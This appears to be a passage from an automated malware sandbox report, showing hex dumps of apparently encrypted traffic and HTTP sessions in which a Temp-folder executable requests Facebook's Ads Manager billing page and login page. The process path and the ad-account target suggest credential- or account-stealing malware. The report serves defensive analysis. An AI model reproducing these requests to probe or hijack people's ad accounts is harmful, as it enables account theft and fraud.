a7 7e f8 91 d0 62 ca 9b 9d 74 79 b4 a5 7e f8 91 d0 62 c2 9b fd 74 d8 b2 c7 7e f8 91 d0 62 aa 9b 9d 74 79 b4 c5 7e f8 91 d0 62 a2 9b fd 74
                                                                                                                                  Data Ascii: t|Wt}WJu"}bBtG}hb"to}Wup}WuA}WuR}Wu#}Wju<~(\bt'~bJty/~W*tG~Q"tg~btye~bt~bty~bt~bty~bt~bty~bt
                                                                                                                                  2022-10-17 20:07:22 UTC1471INData Raw: 93 60 75 b2 9d 60 75 b4 9d 1f 76 47 9c 5f 76 47 9c 67 76 03 9f 63 76 f6 9f 6f 76 a9 9f 51 74 fc 9e c5 74 f7 9e 6f 76 91 93 67 76 be 9e b5 76 be 9e 83 75 b4 91 23 77 87 80 51 74 90 80 04 74 57 91 06 74 6b 91 06 2b 34 c2 72 15 1f f8 65 35 19 e3 67 0d 22 ff 6f 00 3f e8 76 11 38 f8 7c 11 56 a0 36 74 57 af 3f 2b 34 a1 59 45 5b 91 3a 3d 0f a0 38 16 34 ce 36 2b 5a a1 06 13 0e e5 59 3d 0f a0 36 74 18 f4 72 2b 22 f5 37 44 6b d4 68 00 02 e5 7f 45 5b 91 59 2b 38 e5 67 00 02 f2 47 06 19 f0 7f 3d 05 f8 72 20 12 e1 63 27 02 eb 63 49 59 a1 06 47 5e a8 47 44 5b d4 40 42 28 a6 3e 4d 2d d5 32 37 5a a9 30 40 5f d7 33 42 28 a4 42 47 2d a8 31 40 5e a2 40 32 2d a3 36 74 22 f5 34 44 6b d4 68 00 02 e5 7f 46 5b 91 59 2b 38 e5 67 00 02 f2 47 06 19 f0 7f 3d 05 f8 72 20 12 e1 63 27
                                                                                                                                  Data Ascii: `u`uvG_vGgvcvovQttovgvvu#wQttWtk+4re5g"o?v8|V6tW?+4YE[:=846+ZY=6tr+"7DkhE[Y+8gG=r c'cIYG^GD[@B(>M-27Z0@_3B(BG-1@^@2-6t"4DkhF[Y+8gG=r c'
                                                                                                                                  2022-10-17 20:07:22 UTC1478INData Raw: d8 68 00 0e e3 60 15 08 f4 06 26 0e e1 6a 15 08 f4 06 3d 18 df 73 18 07 de 74 23 03 f8 72 11 38 e1 67 17 0e 91 45 06 0e f0 72 11 22 ff 75 00 0a ff 65 11 6b f9 4f 1a 18 e5 67 1a 08 f4 06 17 09 df 69 1a 08 f4 06 04 09 df 69 1a 08 f4 06 07 04 e4 74 17 0e 91 61 11 1f ce 55 1d 0f f4 06 07 0e e5 59 27 02 f5 63 74 3b f0 68 11 07 c2 6f 10 0e 91 61 11 1f ce 4d 11 12 d2 69 10 0e 91 75 11 1f ce 4b 1b 0f f4 06 32 02 fd 63 39 04 f5 63 74 18 f4 72 2b 38 fc 69 1b 1f f9 6f 1a 0c dc 69 10 0e 91 65 1c 0a f8 68 1d 05 f6 4b 1b 0f f4 06 13 0e e5 59 37 04 ff 72 06 04 fd 4b 1b 0f f4 06 07 0e e5 59 37 04 ff 72 06 04 fd 4b 1b 0f f4 06 27 0e e2 75 1d 04 ff 4b 1b 0f f4 06 2c 5e a1 3f 37 0e e3 72 1d 0d f8 65 15 1f f4 50 15 07 f8 62 15 1f f8 69 1a 26 fe 62 11 6b e2 63 00 34 d2 63 06
                                                                                                                                  Data Ascii: h`&j=st#r8gEr"uekOgiitaUY'ct;hoaMiuK2c9ctr+8ioiehKY7rKY7rK'uK,^?7rePbi&bkc4c
                                                                                                                                  2022-10-17 20:07:22 UTC1486INData Raw: fe 74 74 2e e9 72 06 0a f2 72 1b 19 91 28 17 08 e5 69 06 6b f2 69 1a 05 f4 65 00 04 e3 06 26 04 e2 45 1b 06 df 67 10 11 fe 74 74 22 ff 72 24 1f e3 06 16 0a e2 63 42 5f e2 72 06 6b d8 68 00 bb 31 72 06 6b d6 63 00 3d e2 06 07 0f fa 60 4d 03 a3 35 40 0a e2 06 07 0e e5 59 26 0e f0 62 11 19 c0 73 1b 1f f0 75 74 33 fc 6a 30 02 f2 72 1d 04 ff 67 06 12 c3 63 15 0f f4 74 25 1e fe 72 15 18 91 61 11 1f ce 41 06 0a e1 6e 1d 08 e2 06 33 0e e5 55 0d 18 e5 63 19 26 f4 72 06 02 f2 75 74 38 e8 75 00 0e fc 28 30 02 f0 61 1a 04 e2 72 1d 08 e2 06 32 02 f4 6a 10 18 91 61 11 1f ce 44 1b 1e ff 62 07 6b df 67 00 02 e7 63 39 0e e5 6e 1b 0f e2 06 33 0e e5 41 06 0a e1 6e 1d 08 d2 67 06 0f e2 06 33 0e e5 47 18 07 df 63 00 1c fe 74 1f 22 ff 72 11 19 f7 67 17 0e e2 06 27 12 e2 72 11
                                                                                                                                  Data Ascii: tt.rr(ikie&Egtt"r$cB_rkh1rkc=`M5@Y&bsut3j0rgct%raAn3Uc&rut8u(0ar2jaDbkgc9n3Ang3Gct"rg'r
                                                                                                                                  2022-10-17 20:07:23 UTC1583INData Raw: f5 06 06 6b f3 06 19 6b a4 06 4c 6b c5 06 23 6b c7 06 44 6b c8 06 23 6b a0 06 1c 6b f2 06 46 6b e2 06 3f 6b c8 06 23 6b cb 06 1d 6b c8 06 46 6b db 06 05 6b f2 06 33 6b db 06 03 6b cb 06 19 6b d7 06 1f 6b f3 06 33 6b e5 06 00 6b f0 06 33 6b a0 06 1e 6b f3 06 33 6b f9 06 06 6b cb 06 23 6b c7 06 02 6b cb 06 33 6b a0 06 1c 6b f3 06 23 6b df 06 19 6b f3 06 33 6b df 06 4c 6b c5 06 23 6b d7 06 44 6b f0 06 32 6b f5 06 1c 6b f3 06 33 6b e9 06 18 6b f5 06 35 6b e1 06 1b 6b f3 06 19 6b cb 06 1c 6b f3 06 19 6b e5 06 01 6b f3 06 46 6b df 06 19 6b cb 06 23 6b a8 06 19 6b c8 06 19 6b c3 06 1f 6b cb 06 46 6b df 06 04 6b f0 06 19 6b a4 06 00 6b f0 06 33 6b a4 06 19 6b f3 06 19 6b e5 06 1f 6b f3 06 19 6b d7 06 1c 6b cb 06 3c 6b e9 06 30 6b f3 06 46 6b fd 06 01 6b c8 06 19
                                                                                                                                  Data Ascii: kkLk#kDk#kkFk?k#kkFkk3kkkk3kk3kk3kk#kk3kk#kk3kLk#kDk2kk3kk5kkkkkkFkk#kkkkFkkkk3kkkkkk<k0kFkk
                                                                                                                                  2022-10-17 20:07:23 UTC1590INData Raw: ff 06 00 6b f4 06 06 6b f7 06 15 6b f2 06 11 6b bf 06 31 6b e9 06 00 6b f4 06 1a 6b e2 06 1d 6b fe 06 1a 6b 91 29 24 6b e3 06 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b fe 06 00 6b fe 06 1a 6b c7 06 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b c1 06 3a 6b 91 09 1b 6b fd 06 10 6b d2 06 1c 6b f0 06 06 6b 91 55 1a 6b c2 06 0d 6b e2 06 00 6b f4 06 19 6b bf 06 37 6b fe 06 18 6b fd 06 11 6b f2 06 00 6b f8 06 1b 6b ff 06 07 6b e1 06 02 6b fe 06 27 6b e8 06 07 6b e5 06 11 6b fc 06 5a 6b d2 06 1b 6b fd 06 18 6b f4 06 17 6b e5 06 1d 6b fe 06 1a 6b e2 06 5e 6b 91 23 27 6b e8 06 07 6b e5 06 11 6b fc 06 5a 6b d2 06 1b 6b fd 06 18 6b f4 06 17 6b e5 06 1d 6b fe 06 1a 6b e2 06 74 68 b9 06 74 66 c4 06 3a 6b d8 06 25 6b c4 06 31 6b 91 19 17 6b e2 06 00 6b e3 06 1d 6b ff 06 13
                                                                                                                                  Data Ascii: kkkk1kkkkk)$kkkkkkkkkkk:kkkkkUkkkk7kkkkkkk'kkkZkkkkkk^k#'kkkZkkkkkkthtf:k%k1kkkk
                                                                                                                                  2022-10-17 20:07:23 UTC1598INData Raw: ec 14 f5 ea 83 87 f1 66 9c 0b 7a 6f 91 07 79 77 94 06 76 66 9c 0e 73 6b 95 08 7a 77 8d 1a 71 4b 93 08 77 68 98 01 72 65 9f 08 76 65 83 63 77 6b 91 04 72 6c 93 14 f5 6e 9f 0e 73 6d 93 04 76 69 93 04 7c 7e 83 84 95 6a 83 86 d8 63 84 14 f6 8a 90 14 f4 df 99 13 66 e9 70 07 66 eb 29 0e 61 79 13 e7 75 79 11 ba 71 6c 92 04 76 69 97 06 75 63 83 84 e1 63 91 02 75 76 94 0e 6c 63 97 01 70 69 93 04 76 6e 91 04 76 73 89 3f 73 70 84 14 21 6a 9f 13 66 3e 90 08 76 7e 83 53 75 65 8c 08 7c 65 93 1b 66 eb 7c 13 65 0a 90 08 7a 69 93 14 f4 e6 93 0e 76 63 9f 14 f4 86 93 04 76 69 84 17 15 6a 9f 08 76 6d 96 05 69 65 93 08 71 6c 93 1b 7a 65 94 01 75 7a 10 bb 71 6c 90 17 f5 aa 96 06 76 69 83 84 e1 77 95 00 66 ea 44 00 54 6a 90 14 f5 be b3 01 64 7a 10 cb 65 ea 5c 14 f5 ae 93 17 f5
                                                                                                                                  Data Ascii: fzoywvfskzwqKwhrevecwkrlnsmvi|~jcfpf)ayuyqlviuccuvlcpivnvs?sp!jf>v~Sue|ef|ezivcvijvmieqlzeuzqlviwfDTjdze\
                                                                                                                                  2022-10-17 20:07:24 UTC1606INData Raw: 91 6f 74 05 91 61 74 37 91 71 74 46 91 5b 74 10 91 55 74 1f 91 74 74 02 91 68 74 0c 91 30 74 16 91 5a 74 45 91 5d 74 37 91 71 74 38 91 72 74 19 91 6f 74 05 91 61 74 46 91 5b 74 10 91 34 74 38 91 72 74 19 91 6f 74 05 91 61 74 5c 91 7b 74 6b 91 06 74 6b 91 76 74 19 91 69 74 0d 91 6f 74 07 91 63 74 18 91 5a 74 3c 91 6f 74 05 91 62 74 04 91 71 74 18 91 5a 74 6b 91 06 74 6b 91 70 74 0a 91 6a 74 1e 91 63 74 6b 91 06 74 6b 91 07 76 68 95 03 72 6c 99 06 74 6b 91 06 74 6b 91 73 74 18 91 63 74 19 91 28 74 08 91 69 74 05 91 60 74 02 91 61 74 6b 91 7d 74 5b 91 7b 74 37 91 40 74 02 91 6a 74 0e 91 5c 74 02 91 6a 74 07 91 67 74 37 91 75 74 02 91 72 74 0e 91 6b 74 0a 91 68 74 0a 91 61 74 0e 91 74 74 45 91 7e 74 06 91 6a 74 6b 91 06 74 6b 91 65 74 04 91 69 74 00 91 6f 74
                                                                                                                                  Data Ascii: otat7qtF[tUtttht0tZtE]t7qt8rtotatF[t4t8rtotat\{tktkvtitotctZt<otbtqtZtktkptjtctktkvhrltktkstct(tit`tatk}t[{t7@tjt\tjtgt7utrtkthtatttE~tjtktketitot
                                                                                                                                  2022-10-17 20:07:24 UTC1614INData Raw: 56 83 40 94 6e f9 23 0f 70 07 b3 ee a9 f9 8b 94 89 e2 be 63 56 83 48 94 6e f9 97 a1 49 05 b3 ee d1 f9 8b 94 08 b6 3c 6d 56 83 30 94 6e f9 e7 d1 05 05 b3 ee d9 f9 8b 94 75 c1 cd 6f 56 83 38 94 6e f9 90 ec 29 02 b3 ee c1 f9 8b 94 38 2b a3 6a 56 83 20 94 6e f9 71 ba ac 0d b3 ee c9 f9 8b 94 d5 21 57 64 56 83 28 94 6e f9 9c 04 89 0b b3 ee f1 f9 8b 94 24 7b da 62 18 83 70 94 6e f9 f9 ee e1 f9 8b 94 18 83 7c 94 6e f9 f9 2e 11 8f f1 67 6e f9 8b e6 14 7e 8b 94 6e 8f f1 7b 6e f9 8b e6 14 7a 8b 94 6e 8f f1 7f 6e f9 8b e6 d4 c6 fd ee 89 f9 8b 94 1c 83 18 94 6e f9 fd ee 8d f9 8b 94 1c 43 c8 e2 14 26 8b 94 6e 8b 31 8b 18 83 50 94 6e f9 47 ab 1a f6 8b df 24 2e 8b 94 6e 85 8a 69 1a c1 7b 24 52 56 9c b6 6d f9 8b e0 1d b3 98 95 6e f9 fd 6a 14 c6 7b ef 79 05 74 6b d7 85 8a
                                                                                                                                  Data Ascii: V@n#pcVHnI<mV0nuoV8n)8+jV nq!WdV(n${bpn|n.gn~n{nznnnC&n1PnG$.ni{$RVmnj{ytk
                                                                                                                                  2022-10-17 20:07:24 UTC1622INData Raw: 34 1c 34 24 34 2c 34 34 34 3c 34 44 34 4c 34 54 34 5c 34 64 34 6c 34 74 34 7c 34 84 34 8c 34 94 34 9c 34 a4 34 ac 34 b4 34 bc 34 c4 34 cc 34 d4 34 dc 34 e4 34 ec 34 f4 34 fc 34 04 35 0c 35 14 35 1c 35 24 35 2c 35 34 35 3c 35 44 35 4c 35 54 35 5c 35 64 35 6c 35 74 35 7c 35 84 35 8c 35 94 35 9c 35 a4 35 ac 35 b4 35 bc 35 c4 35 cc 35 d4 35 dc 35 e4 35 ec 35 f4 35 fc 35 04 36 0c 36 14 36 1c 36 24 36 2c 36 34 36 3c 36 44 36 4c 36 54 36 5c 36 64 36 6c 36 74 36 7c 36 84 36 8c 36 94 36 9c 36 a4 36 ac 36 b4 36 bc 36 c4 36 cc 36 d4 36 dc 36 e4 36 ec 36 f4 36 fc 36 04 37 0c 37 14 37 1c 37 24 37 2c 37 34 37 3c 37 44 37 4c 37 54 37 5c 37 64 37 6c 37 74 37 7c 37 84 37 8c 37 94 37 9c 37 a4 37 ac 37 b4 37 bc 37 c4 37 cc 37 d4 37 dc 37 e4 37 ec 37 f4 37 fc 37 04 38 0c 38
                                                                                                                                  Data Ascii: 44$4,444<4D4L4T4\4d4l4t4|444444444444444445555$5,545<5D5L5T5\5d5l5t5|555555555555555556666$6,646<6D6L6T6\6d6l6t6|666666666666666667777$7,747<7D7L7T7\7d7l7t7|7777777777777777788


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  11192.168.2.549714157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:22 UTC1198OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:22 UTC1254INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:22 UTC1255INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  12192.168.2.549715157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:22 UTC1257OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:22 UTC1351INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:22 UTC1353INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:22 UTC1354INData Raw: 63 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce58<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="5nQXuWSU">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:22 UTC1356INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:22 UTC1357INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:22 UTC1359INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 4a 7a 41 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 57 56 45 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 6d 50 59 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 57 6c 59 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmJzA"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFWVE"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtmPY"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqWlY"},"3752":{"result":false,"hash":"AT6eS5UTk
